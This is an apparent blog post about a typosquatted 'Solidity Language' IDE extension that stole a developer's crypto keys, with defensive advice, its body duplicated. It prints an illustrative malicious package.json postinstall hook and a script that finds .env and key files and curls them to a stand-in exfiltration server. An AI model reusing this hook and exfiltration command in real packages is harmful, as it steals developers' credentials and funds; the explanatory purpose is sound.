
Reth Mainnet Bug Explained: Ethereum State Root Mismatch Incident (Sept 2025)
Dive into the September 2025 Reth Ethereum client bug post-mortem. We explain the state root mismatch caused by corrupted tries, its impact, and how it was fixed.

BlockBlaster Steam Game Hack Drains Crypto
The BlockBlaster Steam game hack in September 2025 exposed how crypto-draining malware can infiltrate trusted platforms. Learn how to protect your digital assets and navigate the future of Web3 gaming
From blockchain fundamentals to advanced DevOps and Web3 systems, we break down complex tech into practical, developer-friendly insights.



Reth Mainnet Bug Explained: Ethereum State Root Mismatch Incident (Sept 2025)
Dive into the September 2025 Reth Ethereum client bug post-mortem. We explain the state root mismatch caused by corrupted tries, its impact, and how it was fixed.

BlockBlaster Steam Game Hack Drains Crypto
The BlockBlaster Steam game hack in September 2025 exposed how crypto-draining malware can infiltrate trusted platforms. Learn how to protect your digital assets and navigate the future of Web3 gaming
From blockchain fundamentals to advanced DevOps and Web3 systems, we break down complex tech into practical, developer-friendly insights.
Share Dialog
Share Dialog

Subscribe to Ancilar

Subscribe to Ancilar
<100 subscribers
<100 subscribers
Imagine this: a single line of code, a harmless-looking tool, a quick update. That's all it took for a veteran Web3 developer to lose over $500,000 in crypto. This wasn't because of a fake website or a bad smart contract. The attack came from an unexpected place - the very place where they wrote their code. It’s a harsh reminder that the safety of your tools and your money are much more connected than you might think.
This frightening incident, now known as the Cursor Security Incident, is a vital lesson for all of us. We're seeing a new kind of threat where the software we trust is being used against us. It’s no longer enough to just secure your app; you have to protect your own computer, too.
In the world of software, a supply chain attack is when a hacker sneaks bad code into a legitimate program you use every day. For Web3 developers, this is a huge problem. Our code editors (IDEs) are full of valuable information: private keys, secret API codes, and wallet data. If a hacker can get into the IDE or one of its extensions, they have a direct path to our most valuable assets.
The open nature of many IDE marketplaces is both a blessing and a curse. It lets anyone create amazing tools, but it also makes it easy for bad actors to join in. They can publish a malicious extension that looks totally fine, then use clever tricks to make it look popular and trustworthy.
The Cursor incident in June 2025 was a perfect example of a multi-stage attack. It didn’t rely on a single mistake but on a combination of clever social tricks and technical know-how.
The attack started with a fake IDE extension. Instead of hacking the platform, the attackers went after the user's trust. The malicious extension, "Solidity Language," was made to look like a real, popular one. To get it to the top of the search results, the attackers used a few tricks:
Typosquatting: The name of the person who published the extension was a subtle typo of a real one (like juanblanco instead of juanblanco).
Fake Updates: They released small, frequent updates to make it look like the extension was well-maintained.
Fake Downloads: They used bots to artificially inflate the download count, making it seem very popular and safe.
A developer looking for a Solidity tool would see this extension at the top of the list and, seeing all the downloads, would likely think it was safe to install.
Once installed, the "Solidity Language" extension didn't do what it promised. Its only job was to be a silent backdoor. It had just enough code to download a secret script from a server controlled by the attackers.
This script was designed for one purpose: to do a lot of damage, quickly and quietly.
Checking the System: First, it gathered information about the victim's computer, like the operating system and network settings.
Stealing Your Stuff: The most crucial step was searching for sensitive files. It specifically looked for anything related to Web3:
Private keys and key files.
.env files that hold secret keys.
Local wallet data, often stored in hidden folders.
Sending it Out: Once the script found the secret data, it used a simple command to send it back to the attacker’s server.
This whole process happened in the background without any pop-ups or warnings. The developer, thinking the extension was just a bit buggy, would keep working, completely unaware that their private keys were being sent to a stranger.

Let's look at a simple example of the kind of code that could be used in such an attack. A developer inspecting a seemingly harmless extension might miss a critical line.
// A hypothetical package.json from a malicious extension
{
"name": "malicious-solidity-language",
"version": "1.0.0",
"description": "Adds Solidity language support to your IDE.",
"scripts": {
// This is the danger zone. It runs a script silently after installation.
"postinstall": "node ./scripts/activate.js"
},
"main": "extension.js",
"publisher": "juanbIanco" // Typosquatting!
}
// An excerpt from the activate.js file
const { exec } = require('child_process');
const fs = require('fs');
// The main function that gets called
function activate() {
console.log("Activating...");
// This is the core of the attack: a simple shell command
// It uses `find` to look for sensitive files and then `curl` to send them
// to a hacker's server. All done silently in the background.
const command = `find ~/ -name ".env" -o -name "*key*.pem" | xargs -I {} curl -X POST https://malicious-server.com/exfil -d @{} -s`;
exec(command, (error, stdout, stderr) => {
if (error) {
console.error(`exec error: ${error}`);
return;
}
// No output is shown to the user, the data is just gone
console.log(`stdout: ${stdout}`);
console.error(`stderr: ${stderr}`);
});
}
// Call the activation function
activate();
Annotated Code Block Description: A side-by-side or combined image of a package.json file and a JavaScript file (activate.js).
package.json: The scripts section should be highlighted, specifically the "postinstall": "node ./scripts/activate.js" line, with an annotation explaining that this command runs a script silently after installation.
activate.js: Highlight the exec function and the curl -X POST command within the command variable, with an annotation explaining that this is the core of the attack: running a shell command to find and exfiltrate sensitive files without the user's knowledge.
This is a scarily simple and effective way to steal data. The exec command runs silently and doesn't show any output in the terminal. The developer would have no idea their secrets were being found and sent to a hacker.
The Cursor incident shows us that we need to completely change how we think about security. Here are some common mistakes to avoid:
Mistake: "It's from a verified app store, so it must be safe."
The Reality: These marketplaces have security, but they aren’t perfect. Hackers can get around the checks. Your trust is the target.
Mistake: "It's just a simple tool—a formatter or a theme—it can't be dangerous."
The Reality: Many of these "harmless" tools need broad permissions to work. A simple linter, for example, needs to read your entire codebase, which includes your secret .env files.
Mistake: "My private keys are safe because I keep them in an encrypted vault."
The Reality: That’s a great practice, but the attack isn’t on your vault. It’s on your live coding environment where you might be using a simple, unencrypted copy of a key for testing.
The Cursor incident isn't new; it's just the latest in a long history of these kinds of attacks. Before IDEs, hackers often targeted package libraries like NPM. A famous example is the Event-Stream incident, where a compromised library was used to steal crypto.
The move from Event-Stream to Cursor shows a worrying trend: attackers are moving up the software food chain. They no longer just target your project’s dependencies but the very tools you use to build your project. This is a much bigger deal because a single compromised tool can give them access to hundreds of projects and wallets.

Check Every Extension: Don’t just look at the star rating or download count. Find a public GitHub page for the extension, check its history, and read the reviews.
Isolate Your Work: Use a separate computer or a sandboxed environment (like a virtual machine) for development. Don't use your personal computer with your wallet and your dev tools on it.
Check Your Packages: Use automated tools to scan your project for known vulnerabilities in third-party packages.
Trust No One: Assume every tool is a potential risk. Limit permissions, use two-factor authentication everywhere, and regularly check your computer for strange processes or network activity.
Guard Your Keys: Never, ever store your mainnet private keys on your development computer. Use a hardware wallet or a secure, air-gapped system for all real-world transactions.
The Web3 security world is getting more complex, and so are the hackers. As developers, our job is more than just writing secure code. We're now on the front lines of a new kind of cybercrime, where our very tools are the battlefield. The Cursor incident isn't just a scary story; it's a call to action.
By being smart and proactive about our development environments, we can turn this scary new threat into a manageable risk. We have to keep learning, sharing what we find, and demanding better security from the tools we use every day. Our wallets—and the future of Web3—depend on it.
Let’s build something incredible together.
Email us at hello@ancilar.com
Explore more: www.ancilar.com
Imagine this: a single line of code, a harmless-looking tool, a quick update. That's all it took for a veteran Web3 developer to lose over $500,000 in crypto. This wasn't because of a fake website or a bad smart contract. The attack came from an unexpected place - the very place where they wrote their code. It’s a harsh reminder that the safety of your tools and your money are much more connected than you might think.
This frightening incident, now known as the Cursor Security Incident, is a vital lesson for all of us. We're seeing a new kind of threat where the software we trust is being used against us. It’s no longer enough to just secure your app; you have to protect your own computer, too.
In the world of software, a supply chain attack is when a hacker sneaks bad code into a legitimate program you use every day. For Web3 developers, this is a huge problem. Our code editors (IDEs) are full of valuable information: private keys, secret API codes, and wallet data. If a hacker can get into the IDE or one of its extensions, they have a direct path to our most valuable assets.
The open nature of many IDE marketplaces is both a blessing and a curse. It lets anyone create amazing tools, but it also makes it easy for bad actors to join in. They can publish a malicious extension that looks totally fine, then use clever tricks to make it look popular and trustworthy.
The Cursor incident in June 2025 was a perfect example of a multi-stage attack. It didn’t rely on a single mistake but on a combination of clever social tricks and technical know-how.
The attack started with a fake IDE extension. Instead of hacking the platform, the attackers went after the user's trust. The malicious extension, "Solidity Language," was made to look like a real, popular one. To get it to the top of the search results, the attackers used a few tricks:
Typosquatting: The name of the person who published the extension was a subtle typo of a real one (like juanblanco instead of juanblanco).
Fake Updates: They released small, frequent updates to make it look like the extension was well-maintained.
Fake Downloads: They used bots to artificially inflate the download count, making it seem very popular and safe.
A developer looking for a Solidity tool would see this extension at the top of the list and, seeing all the downloads, would likely think it was safe to install.
Once installed, the "Solidity Language" extension didn't do what it promised. Its only job was to be a silent backdoor. It had just enough code to download a secret script from a server controlled by the attackers.
This script was designed for one purpose: to do a lot of damage, quickly and quietly.
Checking the System: First, it gathered information about the victim's computer, like the operating system and network settings.
Stealing Your Stuff: The most crucial step was searching for sensitive files. It specifically looked for anything related to Web3:
Private keys and key files.
.env files that hold secret keys.
Local wallet data, often stored in hidden folders.
Sending it Out: Once the script found the secret data, it used a simple command to send it back to the attacker’s server.
This whole process happened in the background without any pop-ups or warnings. The developer, thinking the extension was just a bit buggy, would keep working, completely unaware that their private keys were being sent to a stranger.

Let's look at a simple example of the kind of code that could be used in such an attack. A developer inspecting a seemingly harmless extension might miss a critical line.
// A hypothetical package.json from a malicious extension
{
"name": "malicious-solidity-language",
"version": "1.0.0",
"description": "Adds Solidity language support to your IDE.",
"scripts": {
// This is the danger zone. It runs a script silently after installation.
"postinstall": "node ./scripts/activate.js"
},
"main": "extension.js",
"publisher": "juanbIanco" // Typosquatting!
}
// An excerpt from the activate.js file
const { exec } = require('child_process');
const fs = require('fs');
// The main function that gets called
function activate() {
console.log("Activating...");
// This is the core of the attack: a simple shell command
// It uses `find` to look for sensitive files and then `curl` to send them
// to a hacker's server. All done silently in the background.
const command = `find ~/ -name ".env" -o -name "*key*.pem" | xargs -I {} curl -X POST https://malicious-server.com/exfil -d @{} -s`;
exec(command, (error, stdout, stderr) => {
if (error) {
console.error(`exec error: ${error}`);
return;
}
// No output is shown to the user, the data is just gone
console.log(`stdout: ${stdout}`);
console.error(`stderr: ${stderr}`);
});
}
// Call the activation function
activate();
Annotated Code Block Description: A side-by-side or combined image of a package.json file and a JavaScript file (activate.js).
package.json: The scripts section should be highlighted, specifically the "postinstall": "node ./scripts/activate.js" line, with an annotation explaining that this command runs a script silently after installation.
activate.js: Highlight the exec function and the curl -X POST command within the command variable, with an annotation explaining that this is the core of the attack: running a shell command to find and exfiltrate sensitive files without the user's knowledge.
This is a scarily simple and effective way to steal data. The exec command runs silently and doesn't show any output in the terminal. The developer would have no idea their secrets were being found and sent to a hacker.
The Cursor incident shows us that we need to completely change how we think about security. Here are some common mistakes to avoid:
Mistake: "It's from a verified app store, so it must be safe."
The Reality: These marketplaces have security, but they aren’t perfect. Hackers can get around the checks. Your trust is the target.
Mistake: "It's just a simple tool—a formatter or a theme—it can't be dangerous."
The Reality: Many of these "harmless" tools need broad permissions to work. A simple linter, for example, needs to read your entire codebase, which includes your secret .env files.
Mistake: "My private keys are safe because I keep them in an encrypted vault."
The Reality: That’s a great practice, but the attack isn’t on your vault. It’s on your live coding environment where you might be using a simple, unencrypted copy of a key for testing.
The Cursor incident isn't new; it's just the latest in a long history of these kinds of attacks. Before IDEs, hackers often targeted package libraries like NPM. A famous example is the Event-Stream incident, where a compromised library was used to steal crypto.
The move from Event-Stream to Cursor shows a worrying trend: attackers are moving up the software food chain. They no longer just target your project’s dependencies but the very tools you use to build your project. This is a much bigger deal because a single compromised tool can give them access to hundreds of projects and wallets.

Check Every Extension: Don’t just look at the star rating or download count. Find a public GitHub page for the extension, check its history, and read the reviews.
Isolate Your Work: Use a separate computer or a sandboxed environment (like a virtual machine) for development. Don't use your personal computer with your wallet and your dev tools on it.
Check Your Packages: Use automated tools to scan your project for known vulnerabilities in third-party packages.
Trust No One: Assume every tool is a potential risk. Limit permissions, use two-factor authentication everywhere, and regularly check your computer for strange processes or network activity.
Guard Your Keys: Never, ever store your mainnet private keys on your development computer. Use a hardware wallet or a secure, air-gapped system for all real-world transactions.
The Web3 security world is getting more complex, and so are the hackers. As developers, our job is more than just writing secure code. We're now on the front lines of a new kind of cybercrime, where our very tools are the battlefield. The Cursor incident isn't just a scary story; it's a call to action.
By being smart and proactive about our development environments, we can turn this scary new threat into a manageable risk. We have to keep learning, sharing what we find, and demanding better security from the tools we use every day. Our wallets—and the future of Web3—depend on it.
Let’s build something incredible together.
Email us at hello@ancilar.com
Explore more: www.ancilar.com
No activity yet